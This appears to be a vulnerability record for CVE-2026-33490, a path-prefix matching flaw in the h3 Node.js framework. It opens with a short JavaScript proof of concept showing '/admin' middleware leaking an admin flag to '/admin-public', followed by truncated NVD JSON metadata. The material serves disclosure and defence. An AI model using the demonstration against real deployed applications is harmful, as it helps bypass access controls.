CVE-2026-33490

// PoC for CVE-2026-33490: H3 Path Prefix Matching Bypass // Description: Demonstrates middleware intended for '/admin' triggering on '/admin-public' const { createApp } = require('h3'); const app = createApp(); // Middleware intended strictly for '/admin' routes app.use('/admin', (event) => { console.log('[!] Admin middleware triggered for path:', event.path); // Simulating setting a privilege flag event.context.isAdmin = true; }); // A public route that should NOT have admin privileges app.use('/admin-public', (event) => { if (event.context.isAdmin) { return { result: 'VULNERABLE', message: 'Admin context leaked to public route!' }; } return { result: 'SAFE' }; }); // Exploit: Accessing /admin-public triggers the /admin middleware // In a vulnerable version, this returns { result: 'VULNERABLE' }

{"cve": {"id": "CVE-2026-33490", "sourceIdentifier": "[email protected]", "published": "2026-03-26T18:16:30.237", "lastModified": "2026-03-31T21:00:13.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "H3 is a minimal H(TTP) framework. In versions 2.0.0-0 through 2.0.1-rc.16, the `mount()` method in h3 uses a simple `startsWith()` check to determine whether incoming requests fall under a mounted sub-application's path prefix. Because this check does not verify a path segment boundary (i.e., that the next character after the base is `/` or end-of-string), middleware registered on a mount like `/admin` will also execute for unrelated routes such as `/admin-public`, `/administrator`, or `/adminstuff`. This allows an attacker to trigger context-setting middleware on paths it was never intended to cover, potentially polluting request context with unintended privilege flags. Version 2.0.2-rc.17 contains a patch."}, {"lang": "es", "value": "H3 es un framework H(TTP) mínimo. En las versiones 2.0.0-0 hasta la 2.0.1-rc.16, el método 'mount()' en h3 usa una simple verificación 'startsWith()' para determinar si las solicitudes entrantes caen bajo el prefijo de ruta de una subaplicación montada. Debido a que esta verificación no verifica un límite de segmento de ruta (es decir, que el siguiente carácter después de la base es '/' o el final de la cadena), el middleware registrado en un montaje como '/admin' también se ejecutará para rutas no relacionadas como '/admin-public', '/administrator' o '/adminstuff'. Esto permite a un atacante activar middleware de configuración de contexto en rutas que nunca se pretendió cubrir, potencialmente contaminando el contexto de la solicitud con indicadores de privilegio no deseados. La versión 2.0.2-rc.17 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-706"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc1:*:*:*:node.js:*:*", "matchCriteriaId": "910077BC-C84C-4CAB-A0A5-761047F6F43C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc10:*:*:*:node.js:*:*", "matchCriteriaId": "603A08FC-B20B-4693-90A1-0BF5F08B43AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc11:*:*:*:node.js:*:*", "matchCriteriaId": "BCC5ECF0-0EED-48BC-95FA-1D2671A971A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc12:*:*:*:node.js:*:*", "matchCriteriaId": "BCCBE75E-DCF6-45FD-B57E-F8E2ADE3129F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc13:*:*:*:node.js:*:*", "matchCriteriaId": "3B66082C-3F3E-4BC6-9543-A2F9CFE3AAC6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc14:*:*:*:node.js:*:*", "matchCriteriaId": "3D1C9D7B-3CE4-427B-93B4-EAF867159AFB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc15:*:*:*:node.js:*:*", "matchCriteriaId": "5AE7D8A6-4506-418A-ABA4-C820A1DA7E7F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc16:*:*:*:node.js:*:*", "matchCriteriaId": "281715D9-6C86-4D4E-9833-C18A8CABD05A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc2:*:*:*:node.js:*:*", "matchCriteriaId": "C5E7779A-00CA-45E7-8F68-1DAB5388ED4A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc3:*:*:*:node.js:*:*", "matchCriteriaId": "064C21F5-8633-45F3-9A3D-3FB029A867B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc4:*:*:*:node.js:*:*", "matchCriteriaId": "DDBC1DFD-8063-4AE1-92D8-B3B33735FEF0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc5:*:*:*:node.js:*:*", "matchCriteriaId": "496314A3-8F2B-4274-9D0D-7F11E896FEA5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc6:*:*:*:node.js:*:*", "matchCriteriaId": "35F49342-D52C-4762-9369-F380C5E7E0B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:h3:h3:2.0.1:rc7:*:*:*:node.js:*:*", "matchCriteriaId": "D11CA1A7-3141-46EA-9687-32C333FC7B0C"}, {"vulnerable": true, ... (truncated)